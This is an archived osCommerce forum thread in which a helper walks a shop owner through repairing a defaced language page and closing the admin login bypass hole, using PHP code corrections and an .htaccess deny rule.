Taipo Posted March 23, 2011 Share Posted March 23, 2011 Example: click this link to see a google search. Almost every site has that T_VAR error you are referring to. The ones that dont, have been defaced by an attacker. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
Taipo Posted March 23, 2011 Share Posted March 23, 2011 The problem is with the german/index.php page. You should probably restore your application_top.php back to what it was at. And reset the german/index.php page to the one I just posted above. That LED lighting code including the javascript looks to me like a defacement. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
Taipo Posted March 23, 2011 Share Posted March 23, 2011 This is the correct code for the application_top // navigation history if (tep_session_is_registered('navigation')) { if (PHP_VERSION < 4) { $broken_navigation = $navigation; $navigation = new navigationHistory; $navigation->unserialize($broken_navigation); } } else { tep_session_register('navigation'); $navigation = new navigationHistory; } $navigation->add_current_page(); Once you replace that, and the defaced german/index.php page wth the code I pasted above, that error should clear. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
Tobosaku Posted March 23, 2011 Author Share Posted March 23, 2011 Thanks Taipo for your support! Now as it is running again and you have mentioned the possibility of a hack: Could the attacker in any way pull down some customer related data? And is there a possibility that other file/date ist affected? If others have the same problem, I've fixed it like this now: 1. Took out the javascript part from german/index.php 2. Replaced the navigation history part in application_top.php with the following: // navigation history if (tep_session_is_registered('navigation')) { if (PHP_VERSION < 4) { $broken_navigation = $navigation; $navigation = new navigationHistory; $navigation->unserialize($broken_navigation); } else { $navigation = new navigationHistory; } } else { tep_session_register('navigation'); $navigation = new navigationHistory; } $navigation->add_current_page(); With last proposed code for navigation history by Taipo it didn't work. Link to comment Share on other sites More sharing options...
Taipo Posted March 23, 2011 Share Posted March 23, 2011 Thanks Taipo for your support! Now as it is running again and you have mentioned the possibility of a hack: Could the attacker in any way pull down some customer related data? And is there a possibility that other file/date ist affected? The faulty code that is allowing the attackers to upload files onto your website begins with this code in the application_top.php files (both files, the one in includes/ and the one in admin/includes) You need to change this code below in both application_top.php files. Change: // set php_self in the local scope if (!isset($PHP_SELF)) $PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF']; To this: $PHP_SELF = (((strlen(ini_get('cgi.fix_pathinfo')) > 0) && ((bool)ini_get('cgi.fix_pathinfo') == false)) || !isset($HTTP_SERVER_VARS['SCRIPT_NAME'])) ? basename($HTTP_SERVER_VARS['PHP_SELF']) : basename($HTTP_SERVER_VARS['SCRIPT_NAME']); This will prevent further exploitation of the admin bypass exploit. You next need to create a file called .htaccess and add it into the includes folder with this in it: Options All -Indexes <Files *.php> Order Deny,Allow Deny from all </Files> This will protect the files and folders within the includes folder from being directly accessed and in particular prevent further exploitation of the language files as has happened in this case. Then comes the hard part. Because your website was vulnerable to the admin bypass exploit, the attackers have probably been able to upload files into your folders, files that will give them further access to your site should you go through all the procedures discussed in many of the discussions on this site to protect your site. So take some time to go through the discussions on these forums and note the lists of instructions others have offered to secure your website and it would pay to follow them, as well as the two I have mentioned here now. Lastly and this is optional, I have written a contribution called osc_sec.php which can also be useful as well. Have a look at the link in my signature for further information. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.